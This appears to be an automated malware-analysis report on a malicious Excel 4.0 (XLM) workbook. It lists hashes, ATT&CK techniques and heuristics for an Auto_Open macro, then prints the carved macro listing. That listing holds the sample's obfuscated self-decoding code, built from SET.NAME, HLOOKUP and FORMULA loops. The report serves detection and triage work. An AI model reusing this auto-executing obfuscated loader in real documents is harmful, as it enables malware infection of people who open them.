Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a3ff153a57ef9560…

MALICIOUS

Office (OLE)

36.0 KB Created: 2020-11-25 10:24:40 Authoring application: Microsoft Excel First seen: 2021-08-25
MD5: 9bd29c285d17653f64ec22bb19faaab1 SHA-1: 4a4dd7138af03bdb110ca37bcf11818283bfb849 SHA-256: a3ff153a57ef9560c60d439cee5150b45740003160b7b9ffa27cc90989933091
140 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1203 Exploitation for Client Execution

The file is an Excel 4.0 macro sheet that contains an Auto_Open defined name, indicating it will execute automatically when the workbook is opened. The critical heuristic firing for 'XLM Auto_Open with dangerous formula APIs' suggests the macro uses functions like RUN to execute arbitrary commands. This is a common technique for downloading and executing further malicious payloads.

Heuristics 3

  • Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAME
    oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
  • XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FN
    Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
  • Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
xlm_macros.txt xlm-macro oletools.olevba.extract_all_macros (XLM macro listing) 6649 bytes
SHA-256: a73b2acd4919583d34b41cf8a6e34f713b45ad93f1f69a8a5fafe0f619d9a056
Preview script
First 1,000 lines of the extracted script
' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  Sheet
' 0085     20 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  KWXPBKciZCp
' 0018     21 LABEL : Cell Value, String Constant - ASFpHZ len=0 
' 0018     23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d  Sheet!B170 
' 0018     22 LABEL : Cell Value, String Constant - dxNRYMI len=0 
' 0018     24 LABEL : Cell Value, String Constant - FbdKOsLXW len=0 
' 0018     26 LABEL : Cell Value, String Constant - fFPTHSHpuCt len=0 
' 0018     23 LABEL : Cell Value, String Constant - FXcaLyNG len=0 
' 0018     20 LABEL : Cell Value, String Constant - hWWEt len=0 
' 0018     22 LABEL : Cell Value, String Constant - iMLoSSI len=0 
' 0018     24 LABEL : Cell Value, String Constant - iYgrQdXsx len=0 
' 0018     23 LABEL : Cell Value, String Constant - kXjqeHRZ len=0 
' 0018     26 LABEL : Cell Value, String Constant - MeZgwToHrBz len=0 
' 0018     24 LABEL : Cell Value, String Constant - MLhuoaufu len=0 
' 0018     21 LABEL : Cell Value, String Constant - MqhluP len=0 
' 0018     27 LABEL : Cell Value, String Constant - NwjjCQuidPDF len=0 
' 0018     24 LABEL : Cell Value, String Constant - pVqTzTcFz len=0 
' 0018     26 LABEL : Cell Value, String Constant - QbMVroypDsR len=0 
' 0018     26 LABEL : Cell Value, String Constant - rlNqIOBWvor len=0 
' 0018     24 LABEL : Cell Value, String Constant - vZXHdsWVt len=0 
' 0018     26 LABEL : Cell Value, String Constant - WrkXZCXnCxV len=0 
' 0018     24 LABEL : Cell Value, String Constant - ZANNvikhX len=0 
' 0018     20 LABEL : Cell Value, String Constant - ZQTDR len=0 
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
'  KWXPBKciZCp,B74,"SET.NAME("ASFpHZ",VALUE("0"))",""
'  KWXPBKciZCp,B77,"SET.NAME("rlNqIOBWvor",ASFpHZ)",""
'  KWXPBKciZCp,B81,"SET.NAME("iMLoSSI",ASFpHZ)",""
'  KWXPBKciZCp,B85,"SET.NAME("hWWEt",COUNTA(MeZgwToHrBz))",""
'  KWXPBKciZCp,B88,"SET.NAME("WrkXZCXnCxV",COUNTA(dxNRYMI))",""
'  KWXPBKciZCp,B90,[],""
'  KWXPBKciZCp,B95,"SET.NAME("pVqTzTcFz","")",""
'  KWXPBKciZCp,B99,"rlNqIOBWvor",""
'  KWXPBKciZCp,B101,"SET.NAME("MLhuoaufu",HLOOKUP("*",MeZgwToHrBz,rlNqIOBWvor,FALSE))",""
'  KWXPBKciZCp,B104,"NwjjCQuidPDF",""
'  KWXPBKciZCp,B107,"SET.NAME("QbMVroypDsR",ASFpHZ)",""
'  KWXPBKciZCp,B111,[],""
'  KWXPBKciZCp,B116,"QbMVroypDsR",""
'  KWXPBKciZCp,B120,"FbdKOsLXW",""
'  KWXPBKciZCp,B123,"iYgrQdXsx",""
'  KWXPBKciZCp,B128,"ZQTDR",""
'  KWXPBKciZCp,B131,"SET.NAME("FXcaLyNG",VALUE(HLOOKUP("*",dxNRYMI,ZQTDR,FALSE)))",""
'  KWXPBKciZCp,B134,"vZXHdsWVt",""
'  KWXPBKciZCp,B138,"pVqTzTcFz",""
'  KWXPBKciZCp,B142,"iMLoSSI",""
'  KWXPBKciZCp,B147,NEXT(),""
'  KWXPBKciZCp,B149,"MqhluP",""
'  KWXPBKciZCp,B152,"SET.NAME("f",INT(T(FORMULA(T(pVqTzTcFz)&"",""&T(MqhluP)))))",""
'  KWXPBKciZCp,B157,"fFPTHSHpuCt",""
'  KWXPBKciZCp,B162,NEXT(),""
'  KWXPBKciZCp,B166,RETURN(),""
'  KWXPBKciZCp,B192,"SET.NAME("kXjqeHRZ",B74)",""
'  KWXPBKciZCp,B197,"MeZgwToHrBz",""
'  KWXPBKciZCp,B199,"SET.NAME("dxNRYMI",R70C13)",""
'  KWXPBKciZCp,B202,"SET.NAME("fFPTHSHpuCt",208)",""
'  KWXPBKciZCp,B205,"SET.NAME("ZANNvikhX",2)",""
'  KWXPBKciZCp,B207,kXjqeHRZ(),""
'  KWXPBKciZCp,B208,HALT(),""